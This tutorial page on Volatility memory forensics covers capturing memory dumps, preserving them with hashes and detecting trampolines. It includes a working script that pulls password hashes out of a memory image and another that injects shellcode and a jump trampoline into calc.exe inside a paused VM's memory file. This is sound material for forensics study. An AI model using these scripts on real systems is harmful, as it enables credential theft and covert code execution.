Python automatic attack script

Source: Internet
Author: User

Automated attack forensics

1. Volatility: Advanced Memory Forensics Framework

After a network has been compromised, you need to verify whether an attack actually took place, which usually requires a memory snapshot of the infected host. Volatility can check kernel objects, detect and extract process memory, and provides general forensic analysis capabilities on top of that.


1.1 Environment setup and capturing a dump

The environment requires Python 2.7.

    • Installing a Windows Python environment with Anaconda
    • Running Anaconda2 (Python 2) and Anaconda3 (Python 3) side by side

1.1.1 Windows

Run volatility:

    python vol.py -h

1.1.2 Linux (Kali)

Switch to the volatility directory in a shell.

1.1.3 Generating a memory dump file

Volatility analyzes a memory dump file, so we first need to capture memory from the system suspected of being attacked. There are three main ways to capture a memory dump:

    • Using the Cuckoo sandbox to generate a memory dump
    • Using VMware to generate a memory dump
    • Using third-party software to capture a memory dump

1.1.5 Using VMware

Pause the virtual machine, then locate the *.vmem file in the VM's directory, for example:

1.1.6 Using third-party software to capture a dump

For physical machines, the following tools are commonly used to capture memory dumps:

    • KnTTools
    • F-Response
    • Mandiant Memoryze
    • HBGary FastDump
    • MoonSols Windows Memory Toolkit
    • AccessData FTK Imager
    • EnCase/WinEn
    • Belkasoft Live RAM Capturer
    • ATC-NY Windows Memory Reader
    • Winpmem
    • Win32dd/Win64dd
    • DumpIt
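Whichever capture method is used, the dump should be copied and hashed before any tool touches it: the code-injection script later on this page opens the image with "r+" and writes into it, so only a hash taken at capture time lets you show the evidence was not altered. The following Python 3 script is an added example, not part of the original article or of Volatility; the file names, the evidence directory and the tiny fake .vmem it builds are constructed for the demonstration.

```python
import hashlib
import os
import shutil
import tempfile

def sha256_file(path, chunk=1 << 20):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as fd:
        for block in iter(lambda: fd.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def preserve_dump(vmem_path, evidence_dir):
    """Copy the paused VM's .vmem into evidence_dir, verify the copy against
    the source and record its hash in a sidecar manifest. Returns (copy_path, hex)."""
    os.makedirs(evidence_dir, exist_ok=True)
    dest = os.path.join(evidence_dir, os.path.basename(vmem_path))
    shutil.copy2(vmem_path, dest)
    digest = sha256_file(dest)
    if digest != sha256_file(vmem_path):
        raise IOError("evidence copy does not match the source image")
    with open(dest + ".sha256", "w") as fd:
        fd.write("%s  %s\n" % (digest, os.path.basename(dest)))
    return dest, digest

def verify_dump(copy_path):
    """Recompute the hash and compare with the manifest; True if untouched."""
    with open(copy_path + ".sha256") as fd:
        recorded = fd.read().split()[0]
    return sha256_file(copy_path) == recorded

def demo_round_trip():
    """Constructed sample (not a real dump): preserve a tiny fake .vmem, then
    simulate the in-place 'r+' write an analysis script might perform on it.
    Returns (copy_matches_source, intact_before_write, intact_after_write)."""
    work = tempfile.mkdtemp()
    src = os.path.join(work, "sample.vmem")
    with open(src, "wb") as fd:
        fd.write(b"\x00" * 4096 + b"MZ" + b"\x90" * 64)
    copy_path, digest = preserve_dump(src, os.path.join(work, "evidence"))
    matches = digest == sha256_file(src)
    intact_before = verify_dump(copy_path)
    with open(copy_path, "r+b") as fd:  # tooling opened the evidence copy read/write
        fd.seek(4098)
        fd.write(b"\xcc")
    intact_after = verify_dump(copy_path)
    shutil.rmtree(work)
    return matches, intact_before, intact_after
```

Calling demo_round_trip() returns (True, True, False): the copy matched the source, verified clean before the write, and failed verification after a single byte was changed.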
1.2 Using the tools

1.2.1 Behavior: Fetch password hash values
    import sys

    # memory image to analyse and the path to the Volatility 2.3.1 checkout
    memory_file = "WinXPSP2.vmem"
    sys.path.append("/downloads/volatility-2.3.1")

    import volatility.conf as conf
    import volatility.registry as registry

    registry.PluginImporter()
    config = conf.ConfObject()

    import volatility.commands as commands
    import volatility.addrspace as addrspace

    config.parse_options()
    config.PROFILE = "WinXPSP2x86"
    config.LOCATION = "file://%s" % memory_file

    registry.register_global_options(config, commands.Command)
    registry.register_global_options(config, addrspace.BaseAddressSpace)

    from volatility.plugins.registry.registryapi import RegistryApi
    from volatility.plugins.registry.lsadump import HashDump

    # enumerate every registry hive in the image and locate SAM and SYSTEM
    reg_api = RegistryApi(config)
    reg_api.populate_offsets()

    sam_offset = None
    sys_offset = None

    for offset in reg_api.all_offsets:
        if reg_api.all_offsets[offset].endswith("\\SAM"):
            sam_offset = offset
            print "[*] SAM: 0x%08x" % offset

        if reg_api.all_offsets[offset].endswith("\\system"):
            sys_offset = offset
            print "[*] System: 0x%08x" % offset

        # once both hives are known, hand their offsets to the hashdump plugin
        if sam_offset is not None and sys_offset is not None:
            config.sys_offset = sys_offset
            config.sam_offset = sam_offset
            hashdump = HashDump(config)
            for hash in hashdump.calculate():
                print hash
            break

    if sam_offset is None or sys_offset is None:
        print "[*] Failed to find the system or SAM offsets."
1.2.2 Behavior: Direct code injection
    import sys
    import struct

    # virtual address inside calc.exe that the trampoline will overwrite
    equals_button = 0x01005D51

    memory_file = "/Users/justin/Documents/Virtual Machines.localized/Windows Server 2003 Standard Edition.vmwarevm/564d9400-1cb2-63d6-722b-4ebe61759abd.vmem"

    slack_space = None
    trampoline_offset = None
    tramp = None

    # read in our shellcode
    sc_fd = open("cmeasure.bin", "rb")
    sc = sc_fd.read()
    sc_fd.close()

    sys.path.append("/downloads/volatility-2.3.1")

    import volatility.conf as conf
    import volatility.registry as registry

    registry.PluginImporter()
    config = conf.ConfObject()

    import volatility.commands as commands
    import volatility.addrspace as addrspace

    registry.register_global_options(config, commands.Command)
    registry.register_global_options(config, addrspace.BaseAddressSpace)

    config.parse_options()
    config.PROFILE = "Win2003SP2x86"
    config.LOCATION = "file://%s" % memory_file

    import volatility.plugins.taskmods as taskmods

    p = taskmods.PSList(config)

    for process in p.calculate():

        if str(process.ImageFileName) == "calc.exe":

            print "[*] Found calc.exe with PID %d" % process.UniqueProcessId
            print "[*] Hunting for physical offsets...please wait."

            address_space = process.get_process_address_space()
            pages = address_space.get_available_pages()

            for page in pages:

                # page is (virtual address, size); map it to an offset in the file
                physical = address_space.vtop(page[0])

                if physical is not None:

                    if slack_space is None:

                        fd = open(memory_file, "r+")
                        fd.seek(physical)
                        buf = fd.read(page[1])

                        try:
                            # look for a run of zero bytes large enough for the shellcode
                            offset = buf.index("\x00" * len(sc))
                            slack_space = page[0] + offset

                            print "[*] Found good shellcode location!"
                            print "[*] Virtual address: 0x%08x" % slack_space
                            print "[*] Physical address: 0x%08x" % (physical + offset)
                            print "[*] Injecting shellcode."

                            fd.seek(physical + offset)
                            fd.write(sc)
                            fd.flush()

                            # create our trampoline: mov ebx, <address> ; jmp ebx
                            tramp = "\xbb%s" % struct.pack("<L", page[0] + offset)
                            tramp += "\xff\xe3"

                            if trampoline_offset is not None:
                                break

                        except ValueError:
                            # no suitable zero run in this page
                            pass

                        finally:
                            fd.close()

                    # check for our target code location
                    if page[0] <= equals_button and equals_button < ((page[0] + page[1]) - 7):

                        # calculate virtual offset
                        v_offset = equals_button - page[0]

                        # now calculate physical offset
                        trampoline_offset = physical + v_offset

                        print "[*] Found our trampoline target at: 0x%08x" % trampoline_offset

                        if slack_space is not None:
                            break

    if tramp is None or trampoline_offset is None:
        print "[*] Could not find both a shellcode location and the trampoline target."
        sys.exit(1)

    print "[*] Writing trampoline..."
    fd = open(memory_file, "r+")
    fd.seek(trampoline_offset)
    fd.write(tramp)
    fd.close()

    print "[*] Done injecting code."
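The injection above leaves two artifacts an analyst can look for in a dump: a seven-byte mov ebx, imm32 / jmp ebx trampoline (BB xx xx xx xx FF E3) patched into a code page, and a payload sitting in a page that is otherwise all zeros. The following Python 3 code is an added detection example, not part of the original article or of Volatility; it assumes pages are supplied as a dict of virtual base address to page bytes (what an address space's available pages would give you) and builds a constructed sample dump to run against.

```python
import struct

PAGE_SIZE = 0x1000

def find_trampolines(pages):
    """pages maps a virtual base address to that page's bytes. Returns a list of
    (trampoline_vaddr, jump_target) for every mov ebx, imm32 / jmp ebx
    (BB xx xx xx xx FF E3) sequence, the form the injection script writes."""
    hits = []
    for base, buf in pages.items():
        idx = buf.find(b"\xbb")
        while idx != -1 and idx + 7 <= len(buf):
            if buf[idx + 5:idx + 7] == b"\xff\xe3":
                target = struct.unpack("<L", buf[idx + 1:idx + 5])[0]
                hits.append((base + idx, target))
            idx = buf.find(b"\xbb", idx + 1)
    return hits

def page_for(pages, vaddr):
    """Return (base, bytes) of the captured page containing vaddr, or None."""
    for base, buf in pages.items():
        if base <= vaddr < base + len(buf):
            return base, buf
    return None

def suspicious_trampolines(pages, zero_threshold=0.9):
    """Flag trampolines whose target was not captured or lands in a page that is
    almost entirely zero bytes, i.e. code placed in slack space."""
    findings = []
    for tramp_va, target in find_trampolines(pages):
        located = page_for(pages, target)
        if located is None:
            findings.append((tramp_va, target, "target not in captured pages"))
            continue
        base, buf = located
        zero_ratio = buf.count(0) / float(len(buf))
        if zero_ratio >= zero_threshold and buf[target - base] != 0:
            findings.append((tramp_va, target, "jump into mostly-zero page"))
    return findings

def build_sample_pages():
    """Constructed sample, not a real dump: a code page holding one benign
    mov/jmp pair and one patched trampoline, plus a zero page with a payload."""
    code = bytearray((i * 7 + 3) % 251 + 1 for i in range(PAGE_SIZE))  # never 0x00/0xff
    slack = bytearray(PAGE_SIZE)
    slack[0x100:0x110] = b"\x90" * 15 + b"\xc3"
    code[0x200:0x207] = b"\xbb" + struct.pack("<L", 0x01005000) + b"\xff\xe3"
    code[0xD51:0xD58] = b"\xbb" + struct.pack("<L", 0x01010100) + b"\xff\xe3"
    return {0x01005000: bytes(code), 0x01010000: bytes(slack)}
```

On the sample, suspicious_trampolines(build_sample_pages()) reports only the trampoline at 0x01005d51 jumping into the zero page; the benign pair that jumps back into real code is found but not flagged, and a target that lies in no captured page is reported separately so it can be checked against the pagefile.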
